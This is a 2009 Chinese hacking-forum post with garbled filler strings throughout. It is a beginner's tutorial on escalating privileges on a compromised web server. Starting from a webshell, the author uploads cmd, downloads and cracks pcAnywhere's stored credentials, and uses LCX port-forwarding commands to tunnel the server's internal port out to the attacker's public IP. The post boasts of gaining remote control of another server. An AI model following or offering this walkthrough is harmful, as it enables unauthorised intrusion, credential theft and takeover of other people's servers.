|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
7 j8 Z/ @: i' s9 i. \( h
, r' X/ ]- v+ W9 l提权方法:pcanywhere+LCX
7 `' o" y7 O: d+ Q! U( ?" R) m8 s5 R' p2 y2 n
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
+ H2 e4 O7 {- j0 |* d) A$ Y& W1 y M' F* S
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
8 _6 B% z4 I2 C0 [
. }9 C$ T r9 E1 f
+ t, o; Z4 i/ }0 o6 Z' b! W) ]4 |查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。 A) @& N- Z: K
. L$ o) t- t( _# h+ B) M+ F; i* I4 \5 w) u. w
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。, P* c l6 H/ F) z6 I
' f4 w5 X# P) q! a& L8 V9 u4 u" r
8 @3 W( I( _& T" U
; x( ]3 z2 Y$ _3 L5 `; Q0 G7 }. e1 u0 ^- f& n" d, n7 {) _! r
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
D1 H7 @1 s, V3 A. P- C$ e0 r* V7 }9 ^+ j/ |
) u* g0 o9 [/ w$ S! b& ]
LCX的用法再简单说下:
4 B4 p1 i" [, P8 `! a
9 V, T0 h \' |服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)/ I7 R0 p1 P1 _) A
, ]4 E) E( C4 M& c" ?+ P
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
+ {1 O6 o4 ]( h- N' b
: a/ q% J# K2 g由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
1 b7 N$ x& a% h顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
+ a8 y9 B* v& y1 r( A3 Z) w1 h' t9 j# z
) R3 u W* L& n5 [# z6 d! W* W: v, K- M1 j' e6 b
( e6 h9 ]! v/ y呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。; P2 f' ?/ M' V' z
# o- |/ |; ^! A9 v" g- h! a0 c' X; X
' Z2 I$ q+ f4 E* L4 v. ]
; G, D$ W3 i% [& y: I: q+ y7 [7 r0 D# f2 ?1 `- J/ A' ^) q, ]8 r
我们本地连接试试,输入我们刚破解的账号密码
* ^, K! p8 l a
. o7 O [1 A/ h8 o- f% G" L9 {1 [* a- ?$ r
呵呵``连接成功,服务器不错,又一个8核^︵^+ i6 B: ~+ ~% Z. X5 a
4 j G8 B; D0 R# ~, O, u6 G2 e4 I3 \8 a3 e/ d! B6 {
) Y7 p5 w3 P" O8 ]& L/ p
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
